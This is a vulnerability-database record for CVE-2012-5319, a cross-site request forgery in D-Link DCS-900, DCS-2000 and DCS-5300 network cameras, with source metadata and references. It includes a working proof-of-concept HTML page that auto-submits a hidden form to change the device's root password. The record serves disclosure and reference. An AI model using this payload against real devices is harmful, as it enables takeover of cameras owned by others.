Sign-up

ID

VAR-E-201202-0068


CVE

cve_id:CVE-2012-5319

Trust: 1.6

sources: EXPLOIT-DB: 36877 // EDBNET: 58167

EDB ID

36877


TITLE

D-Link DCS - 'security.cgi' Cross-Site Request Forgery - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 36877

DESCRIPTION

D-Link DCS - 'security.cgi' Cross-Site Request Forgery. CVE-2012-5319CVE-79770 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 36877

AFFECTED PRODUCTS

vendor:d linkmodel:dcsscope: - version: -

Trust: 1.0

vendor:d linkmodel:dcs-900scope:eqversion:0

Trust: 0.3

vendor:d linkmodel:dcs-5300scope:eqversion:0

Trust: 0.3

vendor:d linkmodel:dcs-2000scope:eqversion:0

Trust: 0.3

sources: BID: 52134 // EXPLOIT-DB: 36877

EXPLOIT

source: https://www.securityfocus.com/bid/52134/info

The D-Link DCS-900, DCS-2000, and DCS-5300 are prone to a cross-site request-forgery vulnerability.

Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.

This issue affects D-Link DCS-900, DCS-2000, and DCS-5300.

<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://www.example.com/setup/security.cgi">
<input type="hidden" name="rootpass" value="your_pass"/>
<input type="hidden" name="confirm" value="your_pass"/>
</form>
</body>
</html>

Trust: 1.0

sources: EXPLOIT-DB: 36877

EXPLOIT LANGUAGE

html

Trust: 0.6

sources: EXPLOIT-DB: 36877

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 36877

TYPE

'security.cgi' Cross-Site Request Forgery

Trust: 1.0

sources: EXPLOIT-DB: 36877

CREDITS

Rigan Iimrigan

Trust: 0.6

sources: EXPLOIT-DB: 36877

EXTERNAL IDS

db:BIDid:52134

Trust: 1.9

db:NVDid:CVE-2012-5319

Trust: 1.6

db:EXPLOIT-DBid:36877

Trust: 1.6

db:EDBNETid:58167

Trust: 0.6

sources: BID: 52134 // EXPLOIT-DB: 36877 // EDBNET: 58167

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2012-5319

Trust: 1.6

url:https://www.securityfocus.com/bid/52134/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/36877/

Trust: 0.6

url:http://www.d-link.com

Trust: 0.3

sources: BID: 52134 // EXPLOIT-DB: 36877 // EDBNET: 58167

SOURCES

db:BIDid:52134
db:EXPLOIT-DBid:36877
db:EDBNETid:58167

LAST UPDATE DATE

2022-07-27T09:19:09.643000+00:00


SOURCES UPDATE DATE

db:BIDid:52134date:2012-02-23T00:00:00

SOURCES RELEASE DATE

db:BIDid:52134date:2012-02-23T00:00:00
db:EXPLOIT-DBid:36877date:2012-02-23T00:00:00
db:EDBNETid:58167date:2012-02-23T00:00:00